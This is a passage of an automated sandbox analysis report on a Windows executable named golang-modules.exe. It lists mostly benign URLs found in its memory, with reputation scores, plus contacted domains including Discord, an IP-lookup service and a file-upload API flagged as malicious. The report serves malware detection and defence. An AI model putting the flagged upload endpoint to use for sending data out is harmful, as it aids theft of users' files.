https://github.com/ashtuchkin/iconv-lite0%Avira URL Cloudsafe
https://url.spec.whatwg.org/#concept-urlencoded-serializer0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom0%VirustotalBrowse
https://hsivonen.fi/encoding-menu/0%Avira URL Cloudsafe
https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object0%VirustotalBrowse
https://github.com/ChALkeR0%VirustotalBrowse
https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F0%Avira URL Cloudsafe
https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js0%VirustotalBrowse
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
https://nodejs.org/api/fs.html0%Avira URL Cloudsafe
https://url.spec.whatwg.org/#concept-urlencoded-serializer0%VirustotalBrowse
https://github.com/nodejs/node/pull/213130%Avira URL Cloudsafe
https://github.com/ashtuchkin/iconv-lite0%VirustotalBrowse
https://hsivonen.fi/encoding-menu/0%VirustotalBrowse
https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges0%Avira URL Cloudsafe
https://nodejs.org/download/release/v14.20.0/node-v14.20.0.tar.gzhttps://nodejs.org/download/release0%Avira URL Cloudsafe
https://nuget.org/nuget.exe0%VirustotalBrowse
http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
https://nodejs.org/api/fs.html0%VirustotalBrowse
https://github.com/nodejs/node/pull/213130%VirustotalBrowse
https://github.com/mysticatea/abort-controller0%Avira URL Cloudsafe
http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png11%VirustotalBrowse
https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F0%VirustotalBrowse
https://github.com/tmpvar/jsdom/blob/aa85b2abf07766ff7bf5c1f6daafb3726f2f2db5/lib/jsdom/living/blob.0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges0%Avira URL Cloudsafe
http://www.midnight-commander.org/browser/lib/tty/key.c0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges0%VirustotalBrowse
https://nodejs.org/0%Avira URL Cloudsafe
https://tools.ietf.org/html/rfc7540#section-8.1.2.50%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits0%Avira URL Cloudsafe
http://www.squid-cache.org/Doc/config/half_closed_clients/0%Avira URL Cloudsafe
https://contoso.com/Icon0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter0%Avira URL Cloudsafe
https://stackoverflow.com/a/5501711/35610%Avira URL Cloudsafe
https://github.com/vercel/pkg/issues/15890%Avira URL Cloudsafe
https://github.com/nodejs/node/pull/336610%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape0%Avira URL Cloudsafe
http://narwhaljs.org)0%Avira URL Cloudsafe
https://github.com/Pester/Pester0%Avira URL Cloudsafe
https://www.ecma-international.org/ecma-262/#sec-promise.all0%Avira URL Cloudsafe
https://code.google.com/p/chromium/issues/detail?id=259160%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
ptb.discord.com
162.159.136.232
truefalseunknown
api.filedoge.com
49.13.193.134
truefalseunknown
api.ipify.org
104.26.13.205
truefalseunknown
NameMaliciousAntivirus DetectionReputation
https://api.filedoge.com/uploadtrue
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
https://mapbox.com/golang-modules.exe, 00000000.00000003.109032560300.000001F1DB67A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109025264317.000001F1DB93F000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109032292214.000001F1DC542000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://url.spec.whatwg.org/#concept-url-origingolang-modules.exe, 00000000.00000003.109022174020.000001F1DB689000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmp, golang-modules.exe, 00000000.00000003.109027303836.000001F1DB6AB000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109025862890.000001F1DB689000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109030107125.000001F1DB6B5000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109028138636.000001F1DB6F8000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109025862890.000001F1DB69F000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://tools.ietf.org/html/rfc6455#section-1.3golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDashgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#sec-atomescapegolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-Atomgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://gist.github.com/XVilka/8346728#gistcomment-2823421golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node-v0.x-archive/issues/2876.golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/#sec-timeclipgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bugs.chromium.org/p/v8/issues/detail?id=10704golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://console.spec.whatwg.org/#tablegolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.iana.org/assignments/tls-extensiontype-valuesgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/issues/35475golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/chalk/ansi-regex/blob/HEAD/index.jsgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://console.spec.whatwg.org/#console-namespacegolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://url.spec.whatwg.org/#urlgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://encoding.spec.whatwg.org/#textencodergolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/issues/13435golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDashgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/tc39/proposal-weakrefsgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://goo.gl/t5IS6M).golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://tools.ietf.org/html/rfc7230#section-3.2.2golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.109098880419.00000161A18DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.109098880419.00000161A179A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.109086074863.00000161925F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109149103671.0000015DE5479000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109149103671.0000015DE55BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD668F000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://stackoverflow.com/questions/37519828golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA7F000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertiongolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.jsgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://tc39.github.io/ecma262/#sec-%iteratorprototype%-objectgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/ChALkeRgolang-modules.exe, 00000000.00000003.109023842068.000001F1DB92B000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/ashtuchkin/iconv-litegolang-modules.exe, 00000000.00000003.109028295749.000001F1DBB01000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026575142.000001F1DBB01000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://url.spec.whatwg.org/#concept-urlencoded-serializergolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://hsivonen.fi/encoding-menu/golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023842068.000001F1DB909000.00000004.00000020.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3Fgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.109086074863.0000016191721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD5401000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://nodejs.org/api/fs.htmlgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/pull/21313golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRangesgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://nodejs.org/download/release/v14.20.0/node-v14.20.0.tar.gzhttps://nodejs.org/download/releasegolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.109086074863.000001619194C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD562B000.00000004.00000800.00020000.00000000.sdmpfalse
  • 11%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/mysticatea/abort-controllergolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.109086074863.000001619194C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD562B000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/tmpvar/jsdom/blob/aa85b2abf07766ff7bf5c1f6daafb3726f2f2db5/lib/jsdom/living/blob.golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023842068.000001F1DB909000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.midnight-commander.org/browser/lib/tty/key.cgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://nodejs.org/golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://tools.ietf.org/html/rfc7540#section-8.1.2.5golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscapegolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digitsgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.squid-cache.org/Doc/config/half_closed_clients/golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://contoso.com/Iconpowershell.exe, 00000011.00000002.109116423300.0000015DD668F000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscapegolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLettergolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://stackoverflow.com/a/5501711/3561golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/vercel/pkg/issues/1589golang-modules.exe, 00000000.00000003.109042790494.000001F1DB561000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/pull/33661golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscapegolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://narwhaljs.org)golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.109086074863.000001619194C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD562B000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/#sec-promise.allgolang-modules.exe, 00000000.00000003.108991096588.000001F1D9A72000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://code.google.com/p/chromium/issues/detail?id=25916golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 0000000F.00000002.109086074863.000001619194C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD562B000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://tools.ietf.org/html/rfc3986#section-3.1golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://v8.dev/blog/v8-release-89golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/issues/39707golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/pull/12607golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slotgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/#sec-line-terminatorsgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-Patterngolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://github.com/tryghost/node-sqlite3golang-modules.exe, 00000000.00000003.109044614385.000001F1DB74E000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109043779570.000001F1DB7D7000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109037243696.000001F1DC545000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109043432322.000001F1DB74E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 0000000F.00000002.109086074863.000001619194C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.109116423300.0000015DD562B000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://fetch.spec.whatwg.org/#bodygolang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023842068.000001F1DB909000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://sourcemaps.info/spec.htmlgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://invisible-island.net/xterm/ctlseqs/ctlseqs.htmlgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/pull/12342golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bugs.chromium.org/p/v8/issues/detail?id=6593golang-modules.exe, 00000000.00000003.108991096588.000001F1D9A72000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/cthackers)golang-modules.exe, 00000000.00000003.109018014171.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109019677302.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109022761492.000001F1DB7D2000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023113789.000001F1DB83E000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109019028033.000001F1DB7E4000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/pull/34375golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtomgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/pull/34010golang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://heycam.github.io/webidl/#dfn-default-iterator-objectgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://heycam.github.io/webidl/#es-iterable-entriesgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/Sebmaster/tr46.js#readmegolang-modules.exe, 00000000.00000003.109025862890.000001F1DB6D1000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027303836.000001F1DB6D1000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://heycam.github.io/webidl/#es-interfacesgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaquegolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-colorgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/nodejs/node/issuesgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigitsgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/bitinn/node-fetch/issues/296#issuecomment-307598143golang-modules.exe, 00000000.00000003.109026521546.000001F1DBB9C000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109027536897.000001F1DBA8A000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109024772174.000001F1DBB98000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109020915941.000001F1DBB61000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109026898269.000001F1DB7C3000.00000004.00000020.00020000.00000000.sdmp, golang-modules.exe, 00000000.00000003.109023842068.000001F1DB909000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://tc39.github.io/ecma262/#sec-object.prototype.tostringgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://url.spec.whatwg.org/#urlsearchparamsgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/chalk/supports-colorgolang-modules.exe, 00000000.00000000.108985935290.00007FF627292000.00000002.00000001.01000000.00000003.sdmpfalse
  • Avira URL Cloud: safe
unknown
